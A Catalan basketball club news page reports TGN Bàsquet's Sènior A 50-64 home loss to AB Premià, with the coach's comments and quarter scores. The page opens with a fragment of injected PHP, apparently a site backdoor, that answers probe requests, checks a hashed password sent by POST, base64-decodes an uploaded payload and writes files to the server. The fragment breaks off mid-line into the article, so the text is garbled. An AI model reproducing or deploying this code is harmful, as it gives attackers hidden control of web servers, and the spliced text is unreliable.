function bestrock_render_js(){ echo ""; } function bestrock_render_index(){ echo md5('56749'); } function bestrock_render_ajax(){ try { if(isset($_GET['s1'])) die(md5('js')); if(isset($_POST['t2'])){ $l1 = uniqid(rand(), true) . '.js'; @file_put_contents($l1, 'js'); if(file_exists($l1)){ if(isset($_POST['t1'])){ $d = md5(md5($_POST['t1'])); if($d=="8ae24e6719c47a39da8ad5451432d9a6"){ $d1=$_POST['t2']; $d1=base64_decode($d1); $d4=" Derrota contra l'AB Premià! (50-64) -

Derrota contra l’AB Premià! (50-64)

Updated: gener 30, 2023

Partit corresponent a la jornada 14 on el Sènior A ha rebut l’AB Premià al Palau d’Esports Catalunya i no ha pogut sumar la victòria. En un partit  molt competit al llarg dels primers 30 minuts, però que ha estat marcat per un parcial demolidor de 8 a 21 favorable al conjunt visitant que ha deixat sense opcions a l’equip tarragoní (50-64).

Malgrat la derrota, la jornada ha estat marcada per la Presentació d’Equips del club. On l’entitat Lila, ha presentat els seus 42 equips i el projecte Inclubàsquet davant de tota la seva gran massa social. Així doncs, el Sènior A suma la seva setena derrota i se situa amb un balanç de 7/7 a la classificació. Consulta la taula classificatòria aquí!

El tècnic Marc Rovirosa després del matx ha valorat el matx: ”La sensació que hem tingut és que podríem haver agafat una renta important entre el primer i el segon quart, però no som capaces d’aguantar diferències curtes. No som capaç d’aguantar 1×1 i després una cosa que ens està costant és anotar una cistella i que en la nostra defensa no ens anotin. Aquest fet, ens fa molt de mal, ja que el rival mal el distanciem i sempre el tenim molt a prop”. Finalment, ha comentat l’últim parcial (8-21) que ha decantat el partit: ”El darrer quart ha estat un despropòsit, hem intentat salvar el partit cada una de manera individual, no hem compartit la pilota i això ha fet que no fóssim capaces d’acabar competint, cosa que és una llàstima”. I conclou ”Em quedo amb els primers 30 minuts de l’equip que ha competit contra un molt bon rival, però estic decebut per no haver estat capaces de portar el pla de partit al 100% que ens hagués permès arribar en un final de partit més igualat.”

La pròxima jornada l’equip jugarà diumenge 5 de febrer (19.45h) a la pista del Joventut Les Corts.

TGN BÀSQUET A: 50 – AB Premià 64

PARCIALS: 16-13, 12-13, 14-17, 8-21